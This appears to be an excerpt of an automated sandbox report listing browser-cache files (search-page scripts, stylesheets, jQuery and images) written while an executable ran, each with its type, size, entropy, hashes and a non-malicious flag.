                                                                                                                                                                                                        Preview:#sw_as .sa_drw{margin:0}#sw_as .sa_zis_parent li.sa_sg,#sw_as .sa_as .sa_sg,#sw_as .sa_as .as_msbsugcontainer.as_msb_page_home{cursor:pointer;display:flex;height:30px;align-items:center;gap:12px;padding:0}#sw_as .sa_as .sa_drw.sa_drw_zis li.sa_sg.sa_ent,#sw_as .sa_as .sa_sg.sa_ent{padding-top:5px;padding-bottom:5px;height:30px}#sw_as #sa_ul:not(:has(div.sa_ent_nrml)) .sa_tm_mainText.sa_tm_rich{font-weight:bold}#sw_as .sa_as #sa_ul li.pp_tile:not(.pp_sTile){padding-left:50px}#sw_as .sa_as .sa_drw .sa_sg_icon_area{width:30px;height:30px;flex-shrink:0;margin-left:8px;margin-right:0}#sw_as .sa_as .sa_sg_icon_area .sa_sg_icon{margin-top:6px}#sw_as .sa_as .sa_sg_icon_area .sa_sg_icon_rrq_fnf{margin-top:9px}.sbox .sb_form #sw_as div.sa_as:not(.sa_nw) #sa_ul.sa_drw .sa_sg .sa_tm,.sbox_cn .sb_form #sw_as .sa_as #sa_ul.sa_drw li.sa_sg div.sa_tm,.sbox .sb_form #sw_as .sa_as #sa_ul.sa_drw li.sa_sg div.sa_tm,#sw_as .sa_as #sa_ul.sa_drw li.sa_sg div.sa_tm,#sw_as .sa_as #sa_ul .sa_tm_mainText{margin:

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\GJDmKr3_TS3Qpm6KEL9UKUQKUO4[1].jpg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:40:12], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6817
                                                                                                                                                                                                        Entropy (8bit):7.859219052464007
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:sO4w46jQPjxS2VUxVMkjqHqHfGaOUE37ri:sO346jojxR0WKHfoe
                                                                                                                                                                                                        MD5:0C41EE31B04E978B4882D17690F03A3A
                                                                                                                                                                                                        SHA1:1890E62ABDFF4D2DD0A66E8A10BF5429440A50EE
                                                                                                                                                                                                        SHA-256:97785743A5FFC303FF8B7B465CD12AF8403F7EED2B2D19687E118E2621059741
                                                                                                                                                                                                        SHA-512:88555E4C500A6B416E8A8E783497B1F6925EEAF708991080E3776757102D9D522CA4830CE924ACA23EC55C579AAC5CFCA7116343236FE8BF8A13FB2DFBD104AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:40:12....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................!e."E.T....!......S-C`!..bB.e.J2.z..:<....9.=.[....... .l..Rwy...X..s..u....!.a gNe..+......r...!..-8ZX%..!.e..e../.]..e.vk.R0._;.|..<hE...l..i..,.s.Ec.e.G..T....|.s..K..............+.|.q.=..1*r..$vSb..^q.(hk/..w8...;.v..p:.....C.k.....q.(.M..M.....}q.r+...N.....#.xK.O.....Ci.S=s...}ea[..>MC4.zN;w.Z.%...g.....jo:.g..L.7.......K3...oa.}.=3.<No.|*l..q...#Iszt.z..g..%...z..m.....q....t.L%.\Xc..r:.a...........*s{.A..=.z%.W....y}}..W..2......*^..s..^...R.$..K..E'M........c.[..Buhvu....H...7N.=...o|...Z[\.:.=..3.......jP...k....p.....r. ...!R.z2....*`T.......H.*k,..`.@..$P@G...(....

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\J0K33CCW.htm

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (58445), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):193268
                                                                                                                                                                                                        Entropy (8bit):5.451031497742737
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:crfyd5FO93Qiq6I8khsNyh/P9OZ8TixYE:crfyA93Qx6I8hNyhX91OxYE
                                                                                                                                                                                                        MD5:B13B18DAD52C999261F2110E7C6CD891
                                                                                                                                                                                                        SHA1:A5603362DDE7C02274D03D7515890B2586E79208
                                                                                                                                                                                                        SHA-256:AF0B0E268CE339A24A1855E5139D18BE86D7C98185DB8E0D8EFE7F9C5F53AA78
                                                                                                                                                                                                        SHA-512:A7851AB09FCC339EC8877F53654532635C3C7FCCBD1C4766939677D47472A3221116E066D0A1A487AAC069B7E1B9CDD07A24DB459E24F794B77035F6E73DDD31
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<!DOCTYPE html>..<html lang="en-us" dir="ltr" >..<head data-info="f:msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,prg-eshbtntrtfac-c,prg-msn-blsbidm,1s-pnpsnicert,pnpwxexpire60,prg-1sw-rpdlaunch-3,1s-wpo-pr1-cttu,prg-cg-crosaloc1,routegraphexp,prg-adspeek,prg-pr2-widget-tab,1s-p2-ignorecm,f-rel-allc,1s-fcrypt,prg-1s-wtch-mg3c,1s-ntf1-hldprrank,1s-ntf2-evlcfc,1s-ntf2-bknlc,1s-ntf2-iptlc,1s-pr2-evlc,1s-pr2-evlcbb,1s-pr2-evlch,1s-pr2-evlcn,1s-pr2-evlcrp,1s-pr2-evlct,1s-prg2-lifecycle,1s-wpo-pr2-ncard,1s-wpo-pr2-pnpfilter,1s-wpo-prg2-evlcfpcap2,1s-wpo-prg2-evlcgddn,1s-wpo-prg2-evlct3,prg-1sw-bg-p2,prg-1sw-cmevlt,prg-p2-tf-bdgpv-ai,prg-pr2-fieplc,prg-pr2-trf-rhighimp,prg-pr2-wxevolnoti,prg-upsaip-w1-t,1s-rpssecautht,jj_fac_c,prg-pr2-pred-dyf,chatn_v2_t1,1s-notifmapping,1s-shp-rc-t-addu3,1s-shp-rc-ta-addu3,1s-shp-rc-ta-after1,prg-sh-frnr,prg-wx-dhgrd-c,prg-sh-dealsdaypdp,prg-sh-rmitmlnk,nopinglancecardit,prg-cg-ingames-ct,prg-1s-workid,1s-temp-wid-t,prg-1s-twid,

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\KC_nX2_tPPyFvVw1RK20Yu1FyDk[1].svg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):726
                                                                                                                                                                                                        Entropy (8bit):4.636787858533541
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tbH41nlcWYiB1+Xl0ML2t1iOfEmmgaUEUZQ6nMAIPWSxs4yPISEIe9t8aayPISEx:t741nTYifqLL2+O7mgaxSQ6MFnE3nkO
                                                                                                                                                                                                        MD5:6601E4A25AB847203E1015B32514B16C
                                                                                                                                                                                                        SHA1:282FE75F6FED3CFC85BD5C3544ADB462ED45C839
                                                                                                                                                                                                        SHA-256:6E5D3FFF70EEC85FF6D42C84062076688CB092A3D605F47260DBBE6B3B836B21
                                                                                                                                                                                                        SHA-512:305C325EAD714D7BCBD25F3ACED4D7B6AED6AE58D7D4C2F2DFFCE3DFDEB0F427EC812639AD50708EA08BC79E4FAD8AC2D9562B142E0808936053715938638B7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16">.. <path d="M0 0h16v16h-16v-16z" fill="none"/>.. <path fill="#007DAA" d="M11 4h4l-5-4v3c0 .552.447 1 1 1zm-3-1v-3h-4.5c-.828 0-1.5.672-1.5 1.5v13c0 .828.672 1.5 1.5 1.5h10c.828 0 1.5-.672 1.5-1.5v-8.5h-4c-1.654 0-3-1.346-3-3zm4.707 10.707c-.181.181-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293s.293.431.293.707-.112.526-.293.707zm0-5.414c.181.181.293.431.293.707s-.112.526-.293.707-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293z"/>..</svg>

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\P2A3uGO2O64dixlm8-ndJ5_iyo4[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2169), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2169
                                                                                                                                                                                                        Entropy (8bit):5.302641155413102
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:1cLdSF8cWOr7dDv8NQtaPVcbnAhaNaswAUbDdDLpmhMi7WViUCS7SDDRb:1cZSDBdDv8saMPgHfLEM8Xb3Rb
                                                                                                                                                                                                        MD5:61533293909D97252C70E82BD574BA68
                                                                                                                                                                                                        SHA1:7408DD25C19AE7BAF954074576A2F73FBB174310
                                                                                                                                                                                                        SHA-256:99EC639C3DDC51E7882FAB9C08EC5A905B49F4B04D1C47B6DF40F3924E81CD8E
                                                                                                                                                                                                        SHA-512:BF8F8879D1CABD6B8B9C6CAF9FC0A6F68362FC62328112636D78A15A4C08B35EA52E1DD8048715F2BD0E945BB0D2D8D7655E68A065942E89316E303BB536BB41
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function l(n){return parseFloat((_w.getComputedStyle?_w.getComputedStyle(n):n.currentStyle).width)}var a="results_container",t="sb_shr sw_conv",v="sb_shr sw_conva",y={"ans2 ans_n2 ans_msnO":1},i={"sb_h3 cttl":1},r="sb_ltw",p="sb_ans",n=[],u=!!_G.SPSA,f=u?{ansC:1,results:1,sa_bop:1}:{results:1},e=!1,o=20,w=-28,b=function(){if(typeof _d.querySelector!="undefined"){var n=".sb_shr{left:"+w+o+"px;width:0;float:right;margin-left:5px}.sb_ltw{margin:0 0 0 -55px;clear:both;float:left;display:block;width:50px}.pi_tc{float:right;}";sj_ic(n);sj_evt.bind("sp.enter_conv",g,1);sj_evt.bind("sp.leave_conv",h,1);sj_evt.bind("sp.submit_conv",h)}},k=function(){var u,o,i,n,s,r,t,h;if(!e){for(u=_ge(a),o=u?u.childNodes:[],i=0;i<o.length;i++)if(n=o[i],n.id&&f[n.id]||n.className&&f[n.className])for(s=n?n.childNodes:[],r=0;r<s.length;r++)for(t=s[r].firstChild;t;)h=t.nodeType,h!==3&&h!==8&&d(t),t=t.nextSibling;e=!0}},d=function(n){var i=n.className,t;if(i&&i.indexOf(p)>-1){if(u)for(t=n.firstChild.fir

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\SO02eTikN8ZV7bCSXFKur4CKSoQ.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):242
                                                                                                                                                                                                        Entropy (8bit):4.86807996961474
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                                                                                                                                                        MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                                                                                                                                                        SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                                                                                                                                                        SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                                                                                                                                                        SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\e1HSyVFyJooWdBqZJqsmOfZmunU.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1333), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                        Entropy (8bit):5.118534997873121
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:PlQiztVfI2TdzmkUamV2an3pQ8TIOKEKzbkzER8zXOvD6AYlNyUEr040x0e0v0tn:NQ6rGNIyAbAEuzYDCN2rnWJQSya
                                                                                                                                                                                                        MD5:EEE13BD45C83C7611E9E36689E385FBD
                                                                                                                                                                                                        SHA1:5EA35979E3AC518291E4D7179F417971FD0DC874
                                                                                                                                                                                                        SHA-256:E1DCAF1B7BB92C803802ABAB8D544D277ABF34C06693BD2B83BB598C0DBC7496
                                                                                                                                                                                                        SHA-512:1361145E4C71FC176F76AE84D96F057F8DFA7461FB4926B779F3C059B7C6C8E4BCEFA9B883309D3C3AE6895570F293BF6EEC5374C242C48019CBD6202D4D0373
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var CaptionClickable;(function(){function t(){for(var i,r=document.querySelectorAll(".b_caption"),u=document.querySelectorAll(".b_imgcap_altitle"),t=0;t<r.length;t++)i=r[t],i&&n(i);for(t=0;t<u.length;t++)i=u[t],i&&n(i)}function n(n){var t=n.previousElementSibling,f,e,o,u,r,s;if(t&&(f=null,t.tagName==="H2"||t.querySelector("h2")?(e=t.tagName==="H2"?t:t.querySelector("h2"),e&&e.querySelector("a")&&(f=e)):t.tagName==="H3"||t.querySelector("h3")?(o=t.tagName==="H3"?t:t.querySelector("h3"),o&&o.querySelector("a")&&(f=o)):f=n.querySelector("h2, h3"),u=n.querySelector("p"),f&&u&&i(u.classList)&&(r=f.querySelector("a"),r))){if(u.addEventListener("mouseover",function(){r&&(r.style.textDecoration="underline",n.style.cursor="pointer")}),u.addEventListener("mouseout",function(){r&&(r.style.textDecoration="",n.style.cursor="")}),s=u.parentElement,s&&s.tagName==="A")return;u.addEventListener("click",function(){if(r){_w.si_T&&_w.si_T(r.getAttribute("h"));var n=window.getSelection();(n===null||n===voi

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\f5M90q9eKVXkGU-DAv9Aa4jef2k.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (674), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):674
                                                                                                                                                                                                        Entropy (8bit):5.239693493116514
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:GyX+fnReu8VliHMtm5vXuMp4CWhneMNqOgqpsRWc9mMCDBMw0n:GS4Reu+kSkNCnvVgqSRWzAn
                                                                                                                                                                                                        MD5:8D078E26C28E9C85885F8A362CB80DB9
                                                                                                                                                                                                        SHA1:F486B2745E4637D881422D38C7780C041618168A
                                                                                                                                                                                                        SHA-256:0BF9F3AD9CDBBC4D37C8B9E22DD06CC26EEA12A27EF6C0F95DB6CBE930177461
                                                                                                                                                                                                        SHA-512:B808A972CD44E6BDA01AC1F8D904D5A281F33B9238B8CAAB03DECB6ADB6B494B19DD9BB35E3D1EA3CA914FF4957155F6D2CB5A9B3A00C2195F80F52804FFB244
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var LinksColorOnMD;(function(n){function i(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function o(n){if(n.button===0&&!n.ctrlKey&&!n.shiftKey){var f=i(sj_et(n));f&&(Lib.CssClass.add(f,t),r[f.href]=sb_st(function(){u(f)},5e3))}}function u(n){Lib.CssClass.remove(n,t)}function s(n){h(n);var r=i(sj_et(n));r&&Lib.CssClass.remove(r,t)}function h(n){var t=i(sj_et(n)),f;t&&(f=r[t.href],f&&sb_ct(f),e&&u(t))}function f(){for(var n,i=_d.getElementsByTagName("A"),t=0;t<i.length;t++)(n=i[t],n)&&(sj_be(n,"mousedown",o),sj_be(n,"click",s))}var t="b_LinksColorMD",r={},e=sj_cook&&sj_cook.get("SRCHHPGUSR","NEWWND")==="1";n.bind=f;f()})(LinksColorOnMD||(LinksColorOnMD={}))

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\jk2F-rpLS_Gysk7hn3CVhA9oQhY.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (824), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):824
                                                                                                                                                                                                        Entropy (8bit):5.3314854117420465
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2QQ3xVJjKVJ5o7VEioPVKofuVJ0PoRGP2QbAX53CO2Wd6o0YmmBM:AjWUJEhNZsvc8XgO2Wdh0Jm6
                                                                                                                                                                                                        MD5:3FF8EECB7A6996C1056BBE9D4DDE50B4
                                                                                                                                                                                                        SHA1:FDC4D52301D187042D0A2F136CEEF2C005DCBB8B
                                                                                                                                                                                                        SHA-256:01B479F35B53D8078BACA650BDD8B926638D8DAAA6EB4A9059E232DBD984F163
                                                                                                                                                                                                        SHA-512:49E68AA570729CC96ED0FD2F5F406D84869772DF67958272625CBA9D521CA508955567E12573D7C73D7E7727260D746B535C2CE6A3ACE4952EDF8FD85F3DB0DD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function i(){var f="data-load",u,i;if(n&&!n.hasAttribute(f))try{if(_d.body.appendChild(n),typeof sj_gx=="function"){if(u=r.replace("%IG%",_G.IG).replace("%IID%",n.getAttribute("data-iid")).replace("%PARTNER%",n.getAttribute("data-ptn")).replace("%ENABLEP%",n.getAttribute("data-ep")).replace("%ICONPRELOADED%",n.getAttribute("data-iconpl")),n.setAttribute(f,"1"),i=sj_gx(),!i)return null;i.onreadystatechange=function(){typeof sj_appHTML=="function"&&4==i.readyState&&200==i.status&&sj_appHTML(n,i.responseText)};i.open("GET",t?SbiTst.at(u):u,!0);i.send(null)}}catch(e){}}function u(){if(n){var r=n.getAttribute("data-evt");r&&!t?sj_evt.bind(r,i,!0):i()}}var r="/images/sbi?mmasync=1&ig=%IG%&iid=%IID%&ptn=%PARTNER%&ep=%ENABLEP%&iconpl=%ICONPRELOADED%",n=_ge("sbicom_loader"),t=typeof SbiTst!="undefined";u()})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\jquery-3.6.3.min[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):89947
                                                                                                                                                                                                        Entropy (8bit):5.290839266829335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:ENjxXU9rnxD9o5EZxkMVC6YLtg7HtDuU3zh8cmnPMEgWzJvBQUmkm4M5gPtcNRQK:EcqmCU3zhINzfmR4lb3e34UQ47GKL
                                                                                                                                                                                                        MD5:CF2FBBF84281D9ECBFFB4993203D543B
                                                                                                                                                                                                        SHA1:832A6A4E86DAF38B1975D705C5DE5D9E5F5844BC
                                                                                                                                                                                                        SHA-256:A6F3F0FAEA4B3D48E03176341BEF0ED3151FFBF226D4C6635F1C6039C0500575
                                                                                                                                                                                                        SHA-512:493A1FE319B5C2091F9BB85E5AA149567E7C1E6DC4B52DF55C569A81A6BC54C45E097024427259FA3132F0F082FE24F5F1D172F7959C131347153A8BCA9EF679
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:/*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},S=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||S).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\kzHfYwAwahpHm-ZU7kDOHkFbADU.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3363
                                                                                                                                                                                                        Entropy (8bit):5.195022922251816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                                                                                                                                                        MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                                                                                                                                                        SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                                                                                                                                                        SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                                                                                                                                                        SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lvCKZ07bEYtoYmY62ifMzVa0RIE[1].jpg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:59:08], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5944
                                                                                                                                                                                                        Entropy (8bit):7.819206752415454
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sUbkQe7dQVaRFmwmIE1KFxQ5JKPxCLNO8XrhNOyYSIyQ3DEmISwnFlE6NlG:s+od96rIE1KRCLHXl4DPzEmISwFlE6Nc
                                                                                                                                                                                                        MD5:F6E70DA298349AD94215F0B4A6875037
                                                                                                                                                                                                        SHA1:96F08A674EDB118B6862663ADA27CCCD56B44481
                                                                                                                                                                                                        SHA-256:68B6356BA9F37FF17EAE98BC094A493075F83D446B1E88F1ED32C2926E72E76C
                                                                                                                                                                                                        SHA-512:AFA16D89B1395F1318F42757F9451553F425539087E2EE40EC9FB14EC1FEB0C80254252951472ACC4AB8D4245E53E75F2C43FE41DAF9EC7DA8526C2F7B669BD4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:59:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.........................................................................................h......................E..T..r..D........@..H.F&....`5.e.%...."..U@C.r.e...5.-.`4".[.`.1C.$)..pZ.".;. .(..w...x.f..*sU[....Y..<.:...b..=+.........n\.b)sv/4^`-.kN.;.v..X....Z......#_...N.....j..4.\......T..,.....B..&..L....^LcJ.KA.=....!iEY...!N....Z.:.d.i..F..d...sP.w=<..59]O..u.?..3...]i....F...C.X...[M..z..<...k..rL.UYr.jz.@ sTf..D8,5.+..<jWr..oL...<H.k;.A I.k)...'.y.j.uZ.,4......(.\HH.ByC..*1.jt.X...Z.......w......`.v.TZ.M.f.J.}.F.e..Te.-N@S...+.].\..u-9..Xg* .B.[M.$..'.ry....Zf...CV.D...S...65 `mH@#.j[.y."...r ).5.B\.o...B...Ee..Q@....,..)..u#..i.j.jAsT...[J.c_...'.....................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mobile-image[1].png

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 375 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23972
                                                                                                                                                                                                        Entropy (8bit):7.983082688064765
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:OQCmhN3Hqqm87sSOvS8PJKCqedNV7TMzNjdpNQsjtHnUSQkBmSfYuoq9Dgt:dCmr3KqmIdO68MAnnWNjdpBSSQVfWDgt
                                                                                                                                                                                                        MD5:64C4757048F068394817EE126FDBA8A6
                                                                                                                                                                                                        SHA1:3610DC2EB5E3C09809E94BD0694A06C7A51580FF
                                                                                                                                                                                                        SHA-256:A9FEC8F56726ECA81D0600220A6B168FFF112A5283741FD5EC63509AEDBB51D5
                                                                                                                                                                                                        SHA-512:373EE45E16D231B2FF8A897A357A52A58B63430E0BCF728867879F2E10E55C631589D6F63C1675E2E40EB1EF7CEB59B15DF18013EA0F3FA352A3B36296F14DAB
                                                                                                                                                                                                        Malicious:false
